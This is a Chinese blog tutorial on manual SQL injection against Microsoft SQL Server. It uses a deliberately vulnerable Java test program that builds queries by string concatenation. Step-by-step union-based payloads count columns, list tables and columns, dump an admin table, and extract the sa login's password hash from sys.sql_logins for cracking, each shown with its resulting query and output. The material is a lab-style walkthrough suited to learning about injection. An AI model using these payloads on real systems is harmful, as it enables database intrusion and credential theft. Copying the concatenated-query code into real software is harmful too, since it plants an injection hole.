接着上一篇的《mysql手工注入》
参考:http://hi.baidu.com/ciqing_s/item/971bf994365130accc80e5ed
http://hi.baidu.com/moon4ins/item/ed3b181ae472cce139cb30c4
必备知识:
MSSQL注释符号: // 或 – --
也就是说上面两个符号后面的内容会被忽略
环境:
代码还是之前的代码
public class TestSql { public static void main(String[] args) throws InstantiationException, IllegalAccessException, ClassNotFoundException, SQLException { DateExecute de = new DateExecute("MSSQL", "sa", "xxxxxxx","school"); String name = "mynona"; String address="gdut"; name = "mynona‘ and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--"; String sql ="select * from student where name = ‘" + name + "‘ and address = ‘" + address +"‘"; //sql = "select name, password_hash from sys.sql_logins"; System.out.println("执行sql:"); System.out.println(sql); System.out.println("输出结果:"); System.out.println(de.getDateList(sql)); } }
数据库:
目标:
我们看一下视图,发现和mysql很像
可以看到有INFORMATION.SCHEMA.TABLES和INFORMATION.SCHEMA.COLUMNS表
我们完全可以利用mysql手工注入的方法
在上面的视图里面,再往下:
我们的目标就是上面那个表的name和password
查看当前select字段数
name = "mynona‘ order by 1--"; ok name = "mynona‘ order by 2--"; ok name = "mynona‘ order by 3--"; ok name = "mynona‘ order by 4--"; error
可以得出当前select 语句字段数是3
暴数据库名:
name = "mynona‘ and 1=2 union select 1,db_name(),3--";
执行sql:
select * from student where name = ‘mynona‘ and 1=2 union select 1,db_name(),3--‘ and address = ‘gdut‘
输出结果:
[{id=1, address=3, name=school}]
可是数据库名为school
遍历当前数据库的表
name = "mynona‘ and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--";
执行sql:
select * from student where name = ‘mynona‘ and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--‘ and address = ‘gdut‘
输出结果:
[{id=1, address=admin, name=2}, {id=1, address=student, name=2}, {id=1, address=sysdiagrams, name=2}]
可知表为:admin, school , sysdiagrams
遍历指定admin的字段
name = "mynona‘ and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = ‘admin‘--";
执行sql:
select * from student where name = ‘mynona‘ and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = ‘admin‘--‘ and address = ‘gdut‘
输出结果:
[{id=1, address=id, name=2}, {id=1, address=name, name=2}, {id=1, address=password, name=2}]
可知表admin的字段为:id, name, password
遍历admin表数据:
name = "mynona‘ union select id, name, password from admin--";
执行sql:
select * from student where name = ‘mynona‘ union select id, name, password from admin--‘ and address = ‘gdut‘
输出结果:
[{id=1, address=mynona, name=admin}, {id=1, address=gdut, name=mynona}]
即:id=1, address=mynona, name=admin
遍历sys.sql_logins表
name = "mynona‘ and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--";
执行sql:
select * from student where name = ‘mynona‘ and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--‘ and address = ‘gdut‘
输出结果:
[{id=1, address=0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a, name=sa}, {id=1, address=0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f, name=##MS_PolicyEventProcessingLogin##}, {id=1, address=0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f, name=##MS_PolicyTsqlExecutionLogin##}]
可以得到:用户sa的password_hash 为0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a
拿这个hash值破解就可以得到sa的密码了
这篇和上一篇的源文件和测试项目下载地址:
http://download.csdn.net/detail/mmyzlinyingjie/7095041